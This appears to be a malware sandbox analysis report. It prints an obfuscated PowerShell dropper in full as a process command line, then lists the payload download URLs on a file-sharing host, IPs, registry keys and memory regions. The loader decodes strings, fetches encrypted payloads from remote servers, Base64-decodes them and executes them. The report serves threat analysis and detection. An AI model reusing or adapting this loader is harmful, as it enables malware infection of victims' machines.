ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende
'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio
Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl
Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet
Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne)
aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt
UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl
SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180=
(Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr
oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H
gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool
(Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita
speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod
Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm
mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer
NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns
Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky
SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage
MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende
'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr
BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu
tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we
fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv
uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp
FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde
Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn
,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool
(Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg
Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb
BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv
skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss
Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu
');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg.
F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa
dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku
deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada
RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi
i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk
e Ek p)Hy,ro ');Unschool $Owertaen;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function
Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke(
$Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende
'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st
O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn
Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa
d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende
'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/
D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl
zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende
'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp
IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar
Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet
Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne)
aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt
UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl
SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180=
(Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr
oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H
gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool
(Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita
speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod
Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm
mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer
NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns
Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky
SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage
MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende
'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr
BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu
tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we
fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv
uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp
FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde
Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn
,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool
(Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg
Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb
BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv
skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss
Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu
');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg.
F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa
dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku
deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada
RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi
i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk
e Ek p)Hy,ro ');Unschool $Owertaen;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.autoitscript.com/autoit3/J
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/wlorhsXRwl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://fs13n4.sendspace.com/
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/wlorhsP
|
unknown
|
||
|
https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
|
69.31.136.17
|
||
|
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin
|
69.31.136.57
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://www.autoitscript.com/autoit3/
|
unknown
|
||
|
https://fs03n2.sendspaX
|
unknown
|
||
|
https://www.autoitscript.com/autoit3/
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
http://fs03n2.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/wlorhs
|
172.67.170.105
|
||
|
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lBfq
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n2.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/g1h76hMU
|
unknown
|
||
|
http://www.autoitscript.com/autoit3/8
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ
|
unknown
|
||
|
https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi
|
unknown
|
||
|
https://www.autoitscript.com/site/autoit/8
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/g1h76h
|
172.67.170.105
|
||
|
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fs03n2.sendspace.com
|
69.31.136.17
|
||
|
fs13n4.sendspace.com
|
69.31.136.57
|
||
|
www.sendspace.com
|
172.67.170.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
69.31.136.17
|
fs03n2.sendspace.com
|
United States
|
||
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n4.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
|
NULL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
625A000
|
trusted library allocation
|
page read and write
|
|
|
|
1E2C4BB6000
|
trusted library allocation
|
page read and write
|
|
|
|
8D90000
|
direct allocation
|
page execute and read and write
|
|
|
|
ACBC000
|
direct allocation
|
page execute and read and write
|
|
|
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2B6908000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCD1D000
|
heap
|
page read and write
|
||
|
3524000
|
heap
|
page read and write
|
||
|
892E000
|
heap
|
page read and write
|
||
|
32A0000
|
trusted library section
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
21F90000
|
heap
|
page read and write
|
||
|
1B349888000
|
heap
|
page read and write
|
||
|
386F000
|
stack
|
page read and write
|
||
|
34B3000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E2B68F2000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCCA8000
|
heap
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
3422000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
8E60000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2B2BC0000
|
heap
|
page read and write
|
||
|
1E2B4BCE000
|
trusted library allocation
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D2E000
|
stack
|
page read and write
|
||
|
1E2B4AD0000
|
heap
|
page execute and read and write
|
||
|
1E2B2CFB000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
63A0000
|
heap
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
62EC000
|
heap
|
page read and write
|
||
|
8850000
|
heap
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
7DBE000
|
stack
|
page read and write
|
||
|
78CE000
|
stack
|
page read and write
|
||
|
1E2B46A0000
|
heap
|
page read and write
|
||
|
60E9000
|
trusted library allocation
|
page read and write
|
||
|
1E2B6913000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
8B5C000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
6254000
|
trusted library allocation
|
page read and write
|
||
|
1E2B4A20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
1E2B4630000
|
heap
|
page execute and read and write
|
||
|
1E2B45C0000
|
heap
|
page readonly
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
79EB000
|
heap
|
page read and write
|
||
|
432080B000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
1E2B4FB8000
|
trusted library allocation
|
page read and write
|
||
|
214F0000
|
direct allocation
|
page read and write
|
||
|
214E0000
|
direct allocation
|
page read and write
|
||
|
327D000
|
stack
|
page read and write
|
||
|
761D000
|
stack
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
8933000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
5B2C000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
heap
|
page read and write
|
||
|
431F145000
|
stack
|
page read and write
|
||
|
8D6C000
|
stack
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7928000
|
heap
|
page read and write
|
||
|
21D00000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
1B349880000
|
heap
|
page read and write
|
||
|
8860000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
765E000
|
stack
|
page read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
1E2B2AE0000
|
heap
|
page read and write
|
||
|
1E2B5037000
|
trusted library allocation
|
page read and write
|
||
|
6700000
|
direct allocation
|
page read and write
|
||
|
1E2B2E05000
|
heap
|
page read and write
|
||
|
1E2CCB4E000
|
heap
|
page read and write
|
||
|
1E2B4FC1000
|
trusted library allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
8DC0000
|
direct allocation
|
page read and write
|
||
|
62C2000
|
heap
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
8CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
214D0000
|
direct allocation
|
page read and write
|
||
|
1E2CCD36000
|
heap
|
page read and write
|
||
|
33F0000
|
trusted library allocation
|
page read and write
|
||
|
1E2B6947000
|
trusted library allocation
|
page read and write
|
||
|
8915000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCCF2000
|
heap
|
page read and write
|
||
|
62F2000
|
heap
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
1E2CCC9E000
|
heap
|
page read and write
|
||
|
21EA0000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
21A0F000
|
stack
|
page read and write
|
||
|
8DE0000
|
direct allocation
|
page read and write
|
||
|
431F8B9000
|
stack
|
page read and write
|
||
|
21C1E000
|
stack
|
page read and write
|
||
|
1E2B4FE6000
|
trusted library allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
50B0000
|
heap
|
page execute and read and write
|
||
|
21BE0000
|
remote allocation
|
page read and write
|
||
|
33F4000
|
trusted library allocation
|
page read and write
|
||
|
2190F000
|
stack
|
page read and write
|
||
|
7948000
|
heap
|
page read and write
|
||
|
1E2B53D2000
|
trusted library allocation
|
page read and write
|
||
|
1E2CCFFB000
|
heap
|
page read and write
|
||
|
88FD000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
21D10000
|
direct allocation
|
page read and write
|
||
|
333D000
|
stack
|
page read and write
|
||
|
B6BC000
|
direct allocation
|
page execute and read and write
|
||
|
7B20000
|
heap
|
page execute and read and write
|
||
|
431F6FF000
|
stack
|
page read and write
|
||
|
3470000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
21D38000
|
direct allocation
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
21D18000
|
direct allocation
|
page read and write
|
||
|
21D1C000
|
direct allocation
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
